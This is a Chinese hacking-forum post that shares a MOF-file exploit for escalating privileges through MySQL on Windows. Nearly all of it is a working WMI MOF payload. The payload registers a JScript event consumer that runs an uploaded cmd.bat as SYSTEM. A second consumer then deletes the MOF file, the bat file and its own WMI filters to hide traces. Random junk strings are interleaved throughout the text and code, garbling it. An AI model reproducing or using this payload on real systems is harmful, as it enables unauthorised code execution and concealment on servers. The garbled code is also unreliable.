中国网络渗透测试联盟

标题: Mysql 提权即时无错Mof exp [打印本页]
作者: admin    时间: 2013-2-14 00:05
标题: Mysql 提权即时无错Mof exp
这个sql提权MOF需要运行 system下的文件,不能定义路径。  n8 Z+ r" J( u& w% o2 g" w
需要将要运行的命令写入到bat上传到system32目录,然后执行。5 G5 e7 y6 D! G" @
9 m* q* r4 k( B# _1 @
这个sql提权MOF需要运行 system下的文件,不能定义路径。5 I# w! ~; a9 j
需要将要运行的命令写入到bat上传到system32目录,然后执行。# A8 S2 v: \( a  Q, ^0 E! |. q

$ |* X9 ~4 l$ F#pragma3 k, |  \& G9 k7 Z" k. X
                        namespace("\\\\.\\root\\cimv2")
! ]6 U  w  c6 _6 f$ h1 M$ Z                        class, ]5 Q6 F$ z' u  t2 D' B
                        MyClass547- O" S) c& V& d: t
                        {           [key]
% R4 h. C: I# r* `3 Y6 L                        string" i# x. u8 Q: j4 H; ~6 |
                        Name;
( x1 {+ Q( R4 ]# d                        };: `# r' l$ L% Y& h
                        class; E& L( M8 d$ \5 ?3 Z8 ]
                        ActiveScriptEventConsumer
" S. V% l) D- A7 j                        : __EventConsumer {          [key]
3 _0 M& @1 H* B% q4 ]+ ]% d8 q) ]                        string) _  f& Z" t4 t! N2 |- |
                        Name;           [not_null]
- T+ L4 e! W7 _0 z" R2 s1 N+ X                        string
5 i- N$ n6 C6 ?& _                        ScriptingEngine;           string- k: c, A/ s6 Q  E& W0 ^
                        ScriptFileName;           [template]
5 {* G. @9 k- S8 r* L                        string& G/ k! N' s5 D. }) m
                        ScriptText;         uint32 KillTimeout;* [* ~" `6 L, ^1 |. p
                        }; instance of __Win32Provider as $P {
3 k- ?6 G6 A# U- G                        Name! @7 F: U* j3 w2 H# l! z& }
                        =2 O! T8 v1 {  g: N/ B
                        "ActiveScriptEventConsumer";     CLSID =
' x$ g+ R" X" [+ G; ]                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
* k) g- |. ~  W8 c                        PerUserInitialization
5 F8 O7 U$ }( W* x1 f! Q6 m' [                        = TRUE;- }2 C! R5 r& t0 [4 D" {8 M
                        }; instance of __EventConsumerProviderRegistration {         Provider5 f8 R. @5 W& z" P: k
                        = $P;         ConsumerClassNames
" o. r* X$ A2 P) ~                        =2 r. Q! G% u% s
                        {"ActiveScriptEventConsumer"};
' R8 v' L5 c$ K- y                        };
5 {! `9 g1 c: n& r* z                        Instance of ActiveScriptEventConsumer
4 y. B* r( S5 I" K                        as $cons {         Name3 C9 ^( C7 R; E4 H
                        =. i, f  k1 u) W
                        "ASEC";         ScriptingEngine
) Y9 k; t9 m0 P- M: ~                        =
1 m$ O# j7 q8 _. b) _                        "JScript";         ScriptText
$ G9 K0 M. |- ~& r                        =
* F8 ^/ E9 j! H                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };( H7 e8 g3 k) i  N
                        Instance of ActiveScriptEventConsumer
1 w* Q5 |) ^& q  \5 I                        as $cons2 {         Name
! z+ j! }) v+ K7 i4 T                        =  {6 ~8 u9 |4 @/ w& D1 }
                        "qndASEC";         ScriptingEngine, d4 _. _9 `0 c4 P
                        =
! J$ G. [" e2 |# l                        "JScript";         ScriptText
/ I6 x4 R: a" k. H5 t7 U& T" `% i" U                        =
; o. L# U! C& O/ y/ Z; ?7 I: N9 Z                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
3 ~2 q/ e5 U) j) `# w                        }; instance of __EventFilter as $Filt {         Name
9 z7 }2 K( r9 |, R- V' T3 Y                        =
7 @5 A4 S, |' h% t0 d$ p/ U; P4 k                        "instfilt";         Query
5 P7 b) `. M0 i) {4 }* E" }6 E                        =
/ G( A' f% G) B3 @; Z                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage# ]9 A9 V0 C# ^' C; J" n
                        =5 i( S8 M- [! i: t  ~! Y# h; P
                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name; i3 r: {/ X+ z5 H* ?5 a$ i
                        =: O4 \9 S; e+ L" p( t
                        "qndfilt";         Query8 H! H: C7 I7 [4 e0 d1 G
                        =9 o9 Q  K; M1 }) g1 l3 `
                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage5 u) i; y6 {$ U. p/ Y5 F/ U6 S
                        =
2 r' E4 |( d0 {5 _4 R7 C* }                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer# x$ b' n6 o1 \8 M! k" C5 i
                        = $cons;         Filter
0 u7 X& N" k/ H; G                        = $Filt;
0 H6 o0 }3 o* i8 E                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer( j5 I& ^9 U# Y
                        = $cons2;         Filter
) Q+ ~( L& \7 z1 j8 O5 h                        = $Filt2;
& `! c' q' |4 n: n) ]                        }; instance of MyClass547& K5 _; I( f9 T$ a* y* Q
                        as $MyClass {         Name
7 O  o& ]; F. k$ }                        =
) `7 r! [8 z; |: M9 w9 _# V( V5 N                        "ClassConsumer";
- g! v/ o% [! G& {; y                        };



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2